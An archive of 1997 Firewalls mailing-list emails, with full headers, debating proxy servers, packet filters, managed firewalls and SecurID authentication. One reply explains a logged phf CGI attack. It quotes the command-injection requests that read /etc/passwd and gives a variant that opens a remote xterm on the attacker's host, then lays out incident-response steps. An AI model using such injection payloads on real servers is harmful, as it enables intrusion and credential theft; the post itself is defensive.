Workgroups/Win 3.1 >> UNIX >> Macintosh >Does IE run on Macintosh or UNIX? NETSCAPE Navigator can. IE runs on the Mac, but not on Unix. What's that have to do with anything? It's a proxy server--any up-to-date browser can talk to it. >> Integrates with NT network security domain model - Microsoft Proxy Server >> extensively leverages the network-based Windows NT domain security model to >> manage access permission and logging. >> >You must use "Trust" to connect those domains together. And, the "Trust" >can be >compromised to make the NT trust anybody. Sounds scary . . . .! Assuming you have multiple domains, yes. If you run in a Master Domain model (as many companies do), then the trust is there anyway. Again, this is a non-sequitor. The features you are picking at are NT features and have little to do with their proxy server, let along firewalls (which is what this list is about). >> Massive Scalability - Microsoft Proxy Server's cache is limited only by >> Windows NY Server system resources. >> >Can NT scale up to 64 processors, like the SUN servers? Or 12 >processors, like the >Alpha servers. No. >Well guys, this is normal MickySoft marketing hype. And you're surprised? >On 24 May 1997, Jan wrote: >>Let's put the record straight: if you are running MS-machines you'll need a >>complete firewall to shield it all off. Or you can believe all the >>marketing hype and leave your network completely open.... > >I agree with what you said. > >>At 01:39 AM 5/24/97 -0400, Todd Graham Lewis wrote: >>>On Fri, 23 May 1997 Daniel_Yamaguchi@iscci.com wrote: >>> >>>> We, at ISC Computers & Communications, Inc. feel that this solution will >>>> meet your current needs regarding Internet Security. >>> >>>I, at 1025 Greenwood Avenue Apartment 3 in Atlanta, do not. > >>Great... *Why not?* > >You can scroll-up to know why, Jeremy. I did, and what I saw was an obviously biased view against Microsoft. Your apparently dislike of NT has made it difficult for you to put their product in perspective--to figure out where is *makes sense* and does not. Jeremy --- Jeremy D. Zawodny WCNet Technical Geek & Web Stuff "You are what you think." From owner-firewalls-outgoing Wed Jun 4 23:00:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA13188 for firewalls-outgoing; Wed, 4 Jun 1997 22:58:48 -0700 (PDT) Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA13120 for ; Wed, 4 Jun 1997 22:58:28 -0700 (PDT) Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324862-14624>; Thu, 5 Jun 1997 00:01:44 -0600 Received: by A01FS002.mcc.net with Internet Mail Service (5.0.1457.3) id ; Thu, 5 Jun 1997 00:01:25 -0600 Message-ID: From: "Paquette, Trevor" To: "'Walczak, Joe'" , "'firewalls@greatcircle.com'" Subject: RE: ISP Connection Date: Thu, 5 Jun 1997 00:01:24 -0600 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your opinion. And I respect that. The problem here is that you do not TRUST anyone else to manage or operate your firewall. That is the issue. Not if they can do it or not. It is a simple matter of trust. There are companies (mine included) that do manage firewalls for other companies, and we do a pretty damn good job at it. Our clients TRUST us to do it for them. WE are the ones on the hook for any break-ins and possible damage resulting from any outside security incidents. By having others manager their firewall for them, our clients are free from the headaches and hassles of dealing with daily firewall issues. They can concentrate and place their own IT folks in areas that they feel are needed and best used. If that happens to be running a firewall, then great. But if they want the benefit of a secure, reliable and stable Internet connection, but don't have the time, know-how, or need of a firewall administrator, then having someone else run your firewall for you make perfect business sense. > -----Original Message----- > From: Walczak, Joe [SMTP:Joe.Walczak@transquest.com] > Sent: Wednesday, June 04, 1997 12:40 PM > To: 'firewalls@greatcircle.com' > Subject: RE: ISP Connection > > > My only comment here is that I would not let ANYONE else > manage/operate > my firewall, ISP or not!!! Secondly, I would not tell anyone which > firewall am I using. The ISP does not need to know that information. > > Joe Walczak > joe.walczak@transquest.com > >---------- > >From: Mariko Yashada[SMTP:mariko@grfn.org] > >Sent: Wednesday, June 04, 1997 3:01 PM > >To: Firewalls Mailing List > >Subject: Re: ISP Connection > > > > > > > >Thank you for all your comments. Last fall our plan was to connect to > the > >Internet through MCI. We security people said fine, but you will need > a > >firewall for any connections between the Internet and the Enterprise > >Network. So we did an evaluation of firewalls and settled on two we > felt > >best suited our needs. The firewall added enough cost to the project > that > >it was postponed. It has now been revived using our ISP for the > connection > >with the hope the ISP can some way offer the security. I see now we > should > >to follow our original plan and put up a firewall at our end. > > > > > >Here is a related question: > > > >There is another local ISP who will connect us at T1 and install a > firewall > >at our location. They will then administer the firewall remotely from > their > >location. They support three different firewalls, Gauntlet, > Firewall-1 and > >Borderware. The advantage is the savings in admin costs. Has anyone > had any > >experience with this type of arrangement? We have also talked to BBN > about > >their Site Patrol product, which is a remotely managed Gauntlet. > > > >Thanks, > > > >Mariko > > From owner-firewalls-outgoing Wed Jun 4 23:15:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA14828 for firewalls-outgoing; Wed, 4 Jun 1997 23:09:48 -0700 (PDT) Received: from ACSacs.Com (sprite.acsacs.com [206.16.240.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA14774 for ; Wed, 4 Jun 1997 23:09:35 -0700 (PDT) Date: Wed, 4 Jun 1997 23:13:47 -0700 From: "Daniel J Blander - Sr. Systems Engineer for ACS" X-Sender: phaedrus@ferrari Reply-To: "Daniel J Blander - Sr. Systems Engineer for ACS" To: Cy Ardoin cc: firewalls@greatcircle.com Subject: RE: PIX and FW-1 (packet filter Question) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk While I don't disagree with what I think was your underlying thought - that packet filters and stateful-inspection firewalls are good, I think this statement is dangerously incorrect: On Wed, 4 Jun 1997, Cy Ardoin wrote: > I don't think there is anything an application firewall can > do that can't also be done by a "packet filter" firewall. An application firewall specifically controls the content - ie. the commands, functions, etcetera, that can be passed through a given communications session. An application firewall (proxy) can help me to block Pointcast through port 80 by saying that I won't let certain application layer calls occur through port 80. An application firewall can help me to control things that can occur via SMTP (VRFY, EXPN, DEBUG, et.al.) Be careful. Stateful Inspection and Packet filters are good at controlling the IP's that get access, controlling the direction of the session, preventing against spoofing, doing basic service blocking, and making certain that the session is absolutely in sync (SYN's, ACK's, FIN's and RST's) but they do not handle content at the application level. Packet filters work (in general terms) at the Network Layer Stateful-inspection firewalls work at the Network and Transport Layer Application firewalls work at the Application Layer The three should not be considered enemies. They are all important - and the best firewalls have all three on their side..... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Daniel Blander =8^) Sr. Systems Engineer Applied Computer Solutions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Phone: (714) 842.7800 Fax: (714) 842.8299 Email: Daniel.Blander@acsacs.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.acsacs.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From owner-firewalls-outgoing Wed Jun 4 23:39:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29552 for firewalls-outgoing; Wed, 4 Jun 1997 14:05:57 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29462 for ; Wed, 4 Jun 1997 14:05:35 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA17632; Wed, 4 Jun 1997 17:09:14 -0400 Received: from vaxd.PIOS.COM (vaxd.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJOKOK878G8WY05K@gemini.pios.com> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:11:12 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJOKLDQV3K8Y5E4U@PIOS.PIOS.COM> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:08:40 -0400 (EDT) Date: Wed, 04 Jun 1997 14:12:31 -0700 From: Bill Stout Subject: RE: PIX and Firewall-1 X-Sender: stoutb@vaxf.pios.com To: firewalls@greatcircle.com Message-Id: <2.2.32.19970604211231.00a0f4dc@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter Carlson writes.... >in whatway are application level gateways more secure than, say, FW-1 or PIX? >There are certainly capabilities that can be provided via application >proxies that can't be provided by any filter-based technologies, but what >types of attacks are a FW-1 or a PIX vulnerable to that application >proxies aren't? Do not replace a proxy server with a 'State-based Firewall'. State-based or packet filter firewalls are being marketed well. Engineers who work for these companies know better than to replace proxies with filters, but they're not stupid enough to kill potential sales. ;) Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection. A properly configured (Internet) firewall comprises of a proxy server protected from the Internet by a packet filter. The better the packet filter (state-based or extended filter), the less work the proxy server has to do as far as inspecting/denying traffic. The packet filter can also protect the proxy server from misc. IP-based attacks. Good applications for packet filter/State-based firewalls are low-security internet feeds and fast low-latency intranet (10/100/155MB/...) security filtering. Not everyone needs a full application proxy firewall, a subject that comes up when I visit Mom-and-Pop small businesses that want a single feed for their 10 PCs. IMHO - State-based firewalls are 'only' packet filters, and for the corporate environment should not replace the traditional proxy server, but work in conjunction with one. _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and visa-versa, thankfully.* From owner-firewalls-outgoing Wed Jun 4 23:49:13 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA29553 for firewalls-outgoing; Wed, 4 Jun 1997 11:29:27 -0700 (PDT) Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA29466 for ; Wed, 4 Jun 1997 11:29:09 -0700 (PDT) Received: from bass by newman (SMI-8.6/SMI-SVR4) id OAA11400; Wed, 4 Jun 1997 14:30:46 -0400 Message-ID: <3395B45F.7853A99F@unifiedtech.com> Date: Wed, 04 Jun 1997 14:30:55 -0400 From: Mike Jones Organization: Unified Technologies, Inc. X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4m) MIME-Version: 1.0 To: Pedro Salgueiro CC: "'Mike Jones'" , "'firewalls'" Subject: Re: PIX and Firewall-1 X-Priority: 3 (Normal) References: <01BC70CA.41A88880@pcpedro> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Pedro Salgueiro wrote: > I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some: > 1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure). > It may be very complicated establishing rules. I would dispute this, as least as regards FireWall-1. My experience and all the reviews I've seen agree that it's very easy to manage. Now it's certainly the case that something that's easy to configure is easy to MISconfigure, but I don't think there's a firewall in the world that can make up for an admin who doesn't know what he's doing. > 2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known contructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one. I'd be *very* interested in knowing whose firewall that was. I also don't think this is necessarily the case. For example, FireWall-1 (which is the firewall I'm most familiar with) works on Solaris by installing a kernel module which is in the path that IP packets go through. I have a hard time seeing how it could "fail open" in that configuration, though I'd admit that it's theoretically possible. > 3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols,i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols. This is an advantage of applications level firewalls. However, there are reasons other than security (caching and spam filtering, for example) to have proxies in place, and I actually prefer an architecture where the security functions, whether proxy or filter based, are separated from the non-security functions. > Regards, > ---------- > From: Mike Jones > Peter Carlson writes.... > > There are many comparisons made by datacomm, lan times, ziff-davis and > > others. Keep in mind that both pix and fw-1 are glorified packet filters, > > even though they have a fancy name for it. I wouyld stick with an > > application level gateway. They are well accepted and known for being more > > secure. > > Many things are known that aren't so. This claim comes by periodically > in this forum, and I have yet to get an answer to this question: in > whatway are application level gateways more secure than, say, FW-1 or PIX? > There are certainly capabilities that can be provided via application > proxies that can't be provided by any filter-based technologies, but what > types of attacks are a FW-1 or a PIX vulnerable to that application > proxies aren't? -- Mike Jones Sr. Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Thu Jun 5 00:02:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA13664 for firewalls-outgoing; Wed, 4 Jun 1997 12:49:25 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA13419 for ; Wed, 4 Jun 1997 12:48:25 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id MAA24034 for ; Wed, 4 Jun 1997 12:25:22 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA20829; Wed, 4 Jun 1997 14:16:46 -0500 Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma020824; Wed Jun 4 14:16:45 1997 Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id OAA17893; Wed, 4 Jun 1997 14:20:48 -0500 (CDT) Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id OAA09104; Wed, 4 Jun 1997 14:21:18 -0500 (CDT) Date: Wed, 4 Jun 1997 14:21:18 -0500 (CDT) From: Ken Hardy Message-Id: <199706041921.OAA09104@binki.bridge.com> To: jdelgado@nexus.net.mx Subject: Re: Secure Telnet! Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There used to be an alpha-level 16-bit encrypting telnet in the SSLeay archives. I don't know if it's still there or if it's been worked on at all. It's compatible with SSL, not SSH, of course. http://www.psy.uq.oz.au/~ftp/Crypto -- KH From owner-firewalls-outgoing Thu Jun 5 00:09:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06341 for firewalls-outgoing; Wed, 4 Jun 1997 12:06:32 -0700 (PDT) Received: from mail.pfsfhq.com ([199.250.186.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA06260 for ; Wed, 4 Jun 1997 12:06:10 -0700 (PDT) Received: from neteng02 ([199.250.186.189]) by mail.pfsfhq.com (8.6.12/8.6.9) with SMTP id TAA25098 for ; Wed, 4 Jun 1997 19:15:17 -0400 Message-Id: <199706042315.TAA25098@mail.pfsfhq.com> X-Mailer: Calypso Version 2.10.18 Date: Wed, 04 Jun 1997 15:09:19 -0400 From: "John Kemker" To: firewalls@greatcircle.com Subject: Re: ISP Connection Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Handing over your firewall administration to another organization is not, in my personal opinion, a wise move. You are saying, in effect, that you implicitly trust that organization to always think and act in your organization's best interest. This is not realistic. "Only those defenses are good, certain and durable, which depend on yourself alone and your own ability." _The_Prince_ --N. Machiavelli Administer your firewall yourself. Put it up yourself, define the policies yourself and maintain it yourself. =========== REPLY PARTITION =========== On 06/04/97, at 12:01 PM, Mariko Yashada wrote: > > >Here is a related question: > >There is another local ISP who will connect us at T1 and install a firewall >at our location. They will then administer the firewall remotely from their >location. They support three different firewalls, Gauntlet, Firewall-1 and >Borderware. The advantage is the savings in admin costs. Has anyone had any >experience with this type of arrangement? We have also talked to BBN about >their Site Patrol product, which is a remotely managed Gauntlet. > >Thanks, > >Mariko > John E. Kemker III Systems Engineer, Primerica Financial Services 3120 Breckinridge Blvd., Duluth, GA 30199 From owner-firewalls-outgoing Thu Jun 5 00:19:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06941 for firewalls-outgoing; Wed, 4 Jun 1997 12:10:27 -0700 (PDT) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06852 for ; Wed, 4 Jun 1997 12:09:56 -0700 (PDT) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA17338; Wed, 4 Jun 1997 15:13:21 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA02113; Wed, 4 Jun 1997 15:13:18 -0400 (EDT) Date: Wed, 4 Jun 1997 15:13:18 -0400 (EDT) Message-Id: <199706041913.PAA02113@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM, swnuck@unixpros.com Subject: Re: getting passwd file via WWW Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Stan Wnuck >I have noticed on my WWW log files the following 2 entries. > >some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 >some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 Bad news. You've had your /etc/passwd file grabbed on Apr 28th. Someone has most assuredly tried running Crack on it by now and they are not restricted from just running 'cat' or 'ypcat'. The second attempt was not successful as you didn't gave a CGI program called php.cgi in your Web server's cgi-bin directory. But the first was. The fact that both requests cam in so quickly (back to back within two seconds!) suggests that someone was running an automated tool which was scanning Web servers for vulnerabilities and logging successes (and probably squirrelling the ill-gotten passwd files away somewhere). Someone was almost certainly not typing in manually the URL to exploit your server via phf & php. >Does anyone know anything about these cgi scripts or programs? Yes. Everyone has known about the phf bug for over a year now (check out the CIAC and CERT announcements on it). The php.cgi program (which is not as widely distributed) is also a well-known vulnerability. >Or how dangerous this is? Very. If you have a standard Unix /etc/passwd file with readable password hashes (ie. you don't have a 'shadow' password file) then Crack can be run on the text of the password file. If any of your users had a weak password (the same as their username, a proper name, something easily guessed from their GECOS field, a dictionary word or a common alphabetic or numeric sequence, etc.) then the remote cracker can likely telnet or ftp into your Web server as the user with their password. In fact, once they have determined that they can get phf to execute a command on your Web server they are not restricted to just 'cat'ting files readable by userid the Web server is running as. They can also run any remote commands available to users on your machine (presuming you are not running your httpd chroot()d and it sounds like you are not). I.e. some.remote.location.edu could have run (if you have X installed): "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0A/usr/bin/X11/xterm%20-display%20some.remote.location.edu:0 HTTP/1.0" This will often pop up a X windows xterm terminal window on the intruder's display running as the userid the Web server (httpd) is running as. In some cases you will find that you need to change /usr/bin/X11 to /usr/openwin/bin or wherever the vendor has placed the xterm program. Then the system cracker is running an interactive session on your machine without having to even crack any user passwords. In any case, once a system cracker has a foothold (a regular user account on your system) they can then consult the BugTraq archive web site (www.geek-girl.com/bugqtraq) and pick one of several root exploit scripts to use to obtain maximum privilege (my faves currently are the fdformat, Sony monitor calibration setuid utilities and ps commands for Solaris 2.5.1). Usually a cracker can have 'root' access on a vanilla Unix OS Web server within a hour using a regular user account with no privileges. >.............................................., since I am not sure what >my next move would be. 1. 'rm cgi-bin/phf' (whereever your web server is). 2. Take the machine off the network. 3. Copy the /etc/passwd file to a tape or floppy disk. 4. Disable all user accounts (my preference). Change the root password. 5. Back up the entire system to tape. 6. While the backup is running, run Crack (v5) on the old password file. 7. Check out all of the home directories belonging to users whose passwords you are able to crack. 8. Run COPS (an internal Unix audit tool) on the server machine. 9. Connect the machine to a standalone test LAN. 10. From a separate test machine run Satan and/or ISS (external TCP/IP network security audit tools which are aware of common Unix server vulnerabilities) against the machine. 11. Check the machine against the latest CERT (www.cert.org), CIAC (ciac.llnl.gov), BugTraq (www.geek-girl.com/bugtraq/) security vulnerability advisories to see which patches you haven't installed. 12. Bring down the machine. 13. Write up a report including the web server log, any logs from 'last', IP accounting from your router if it is turned on, etc. Summarize the results of your auditing with the Crack, COPS and Satan or ISS tools. Write up recommendations for securing the vulnerabilities found. Send a copy of your security incident report to CERT, Postmaster@some.remote.location.edu, and any other relevant body (ie. if your site is military-related there will be a different agency than CERT to which you should report incidents). 14. FORMAT the machine, make NEW filesystem partitions, RE-INSTALL the OS using the latest vendor distribution CDROM. 15. Make sure that you install all of the latest vendor security patches, that you implement all of the suggestions and fix all of the holes that you found were in your configuration by running COPS and Satan/ISS. Apply any fixes recommended in CIAC, CERT, BugTraq and vendor alerts. 16. Audit your new system by retesting using COPS and Satan/ISS. 17. Carefully restore any critical software or user files/directories (only after first inspecting them for setuid/setgid, world-writable and .rhosts/.shosts files). For example you'll want to restore your Web server files, but carefully inspect any CGI programs for Trojans. 18. Remove any CGI programs which came with your Web server but you do not use (which would be most of them -- ie. phf, test-cgi, nph-test-cgi, etc.). Remove any CGI programs which you have written in a command language or 'shell'. 19. Make users pick a new 'strong' password and re-authenticate themselves to get their account re-enabled. Install a /bin/passwd replacement which screens out obvious and weak passwords. 20. Install Tripwire on the web server machine, checksum the system and other relevant files and periodically re-scan with Tripwire, COPS, Crack and Satan/ISS. Look at WebStalker and other programs which can analyze your Web server log files. Consider installing a firewall or at least a screening router in between your Web server and the Internet. - H. Morrow Long From owner-firewalls-outgoing Thu Jun 5 00:24:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06614 for firewalls-outgoing; Wed, 4 Jun 1997 12:08:04 -0700 (PDT) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06538 for ; Wed, 4 Jun 1997 12:07:35 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id PAA05666; Wed, 4 Jun 1997 15:11:07 -0400 (EDT) Message-Id: In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 15:13:26 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: RE: SecureID, CryptoCard, etc... Cc: joav.kohn@us.landisstaefa.com, Richard.Forno@mail.house.gov, ddrumm@rush.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk With the CEO at Landis & Staefa "gone security crazy" and demanding two-factor authentication (presumably to maintain accountability & audit trails) for employees online, Joav Kohn < applied to the List seeking advice and counsel. >>> anybody using keycard authentication to authenticate users in a >>> winNT/win95 environment? >>> my CEO has gone security crazy and would like to implement keycard >>> authentication across the entire organization. so far, the vendors >>> haven't been much help with advise on how to get win95 to authenticate >>> with the cards. any information would be greatly appreciated. >>> (p.s.. this is for LAN/WAN access, not dial-in) (There was, I'm sad to note, a distinct lack of sympathy for Mr. Kohn's quandry among the List cognoscenti. That rascal Ranum, among others, razzed him for his boss' naivete in seeking security for Win95 systems, and our veteran network managers online were uncharacteristically silent. Probably green with jealousy that Mr. Kohn has a CEO with _both_ interest and budget for network security -- the winning combo, but reportedly rare.) Richard Forno helpfully reported: >SecurID has a NT/95 workstation client for one-pass authentication. Not quite. WinNT, yes. Win95, no. Two-factor authentication -- ACE/SecurID, for example -- typically secures local protected memory, the local network connection, and remote network-based resources. In the NT LAN/WAN universe, this typically requires an ID authentication before a user is allowed direct-logon at his local NT workstation or server; and/or access to selected and protected intranet-based resources (including restricted portions of a public website); and/or connection to the NT Remote Access Service (RAS) or the Internet. On a Win95 machine, ACE/SecurID authentication validates a user's identity before allowing him or her access to the LAN or WAN -- but offers no protection for local information resources on the PC. (If you need local file protection, consider a robust file or disk encryptor. SDTI has one in RSA SecurPC, but there are plenty of others, YEO and the like.) Typically, the authentication server sits on its own Unix or NT machine, and each protected resource -- workstation, server, firewall, RDBS or other network resource -- has its own ACE/Agent (what SDTI used to call an ACE/Client.) Daniel G. Drumm asked why Mr. Kohn specified the LAN/WAN environment in his query: >>Why would the environment have much to do with it? FW1 or TIS Gauntlet >>come with support for Secure/ID, you can have your employees get these >>cards, and authenticate against the Firewall. You can then set a >>user-by-user policy as to what they are allowed access to, and how long >>they can access it for. (Most of the leading firewalls do have ACE/Agent code integrated into them, but the user -- coming into the net at the firewall or elsewhere -- is really authenticating against an ACE/Server, typically on its own host.) ACE/SecurID access can be restricted for groups of users -- as well as individuals -- and those individuals or groups can be limited to specific access paths into a network (i.e., by ACE/Agents, which can be located in a dial-in comm server, the firewall, etc.), as well as by day and hour-of-day. (All SecurIDs -- and, of course, any static passwords issued for temporary emergency access -- also always have a lifespan determined and specified by the local ACE Administrator.) One reason the dial-in/WAN distinction might be important is that different environments have different risks associated with them. There is not enough info here to discuss options for L&S, but Mr. Kohn will have to consider the value of the information being handled online and his LAN and WAN threat environments, in order to make a meaningful decision about whether he needs to supplement authentication with full or session encryption. Strong authentication (without network or app-based encryption) potentially leaves a user's session open to session hijacking -- where an active sniffer is used to splice into an users then-current TCP session (after the user has been authenticated) to physically take over a user's session, with all that user's privileges on the Net. Different threat environments can also make a difference in the choice of token model, at least with SecurID. The classic SecurID is popular with users for its ease of use; user simply prepends a PIN to the 30/60 second "tokencode" from his SecurID (great with encryption; sufficient in most other environments.) PinPad SecurID wraps the PIN in the pseudo-random token-code, protecting it more in high-threat environments. A SoftID program secures the PIN like a PINpad card, but since it is PC-resident software, it's open to different threats, despite encrypted storage and the standard protection mechanisms. Actually, many security pros seem to feel that the token, per se, has become less important as IS organizations look ahead to the emerging need for encryption key-management and all that public-key crypto offers: digital signatures, message and software integrity checks -- as well as message confidentiality and potentially-strong user authentication. I've been preaching this myself for a few years. We are all, today, about get a good measure of the demand for these enhanced security functions as our users react to the s/mime-enabled web browsers from Netscape and Microsoft. If, as many expect, that demand is explosive -- maybe now is the time to look ahead to a corporate public-key infrastructure (PKI). Authentication -- even strong token-based user authentication -- may not be enough. Public-key crypto without a token to off-load the key will excite many, but it's a half-way measure and inevitably vulnerable without a two-factor hand-held base. In short, many more network administrators may find their CEOs "gone security crazy"... and woe be unto him who buys now without looking ahead;-) Authentication is a hassle for users, however vital for auditors, but trinkets like digital sigs intrigue users. Demand is very different when it comes from the bottom up, as well as from the top down. (And PC-resident "private keys" used for digital signatures would be a _painful_ and corrupt compromise.) SDTI (for which I have done consulting for many years) last year bought RSA Data Security and now offers a coherent strategic vision for how their ACE/SecurID customers can -- in the immediate future -- migrate from strong two-factor authentication to a full public-key crypto environment. SDTI sees their ACE/Server evolving from today's authentication server into a PKI-crypto key and certificate manager. Each user's PKC "private keys" wlll be stored in hand-held smartcards, or -- for a transition -- maybe in "soft smartcards," activated by a token-code & PIN.) Other vendors will be offering different strategic visions. Investigating those options ought to be on the agenda, at L&S as elsewhere. PKI is coming -- ready or not! Suerte, _Vin Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> -- From owner-firewalls-outgoing Thu Jun 5 02:00:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA11893 for firewalls-outgoing; Thu, 5 Jun 1997 01:12:36 -0700 (PDT) Received: from cbu.pvtnet.cz (cbu.pvtnet.cz [194.149.105.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id BAA11858 for ; Thu, 5 Jun 1997 01:12:24 -0700 (PDT) Received: from snajdr.pvt.net (snajdr.pvt.net [194.149.103.204]) by cbu.pvtnet.cz (8.8.5/8.7.3) with SMTP id KAA27365; Thu, 5 Jun 1997 10:21:20 +0200 (MET DST) Message-ID: <33967557.62C80DFD@pvt.net> Date: Thu, 05 Jun 1997 10:14:15 +0200 From: Petr Snajdr X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: Vin McLellan , firewalls@GreatCircle.COM Subject: Re: Secure Telnet! References: <33956E4A.6590018C@pvt.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Free ssh client for M$ Windoze from Cedomir Igaly See: ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ 16-bit version : ssh97126.zip 32-bit version : ssh32.zip crypto library for 16-bit version : crypl200.zip crypto library for 32-bit version : crypl110.zip patch for 32 bit crypto library (DES problem) : patch01.zip There are 2 snapshot: ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh.gif tp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh2.gif -- Regards Petr Snajdr From owner-firewalls-outgoing Thu Jun 5 02:46:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA25602 for firewalls-outgoing; Wed, 4 Jun 1997 16:49:24 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP 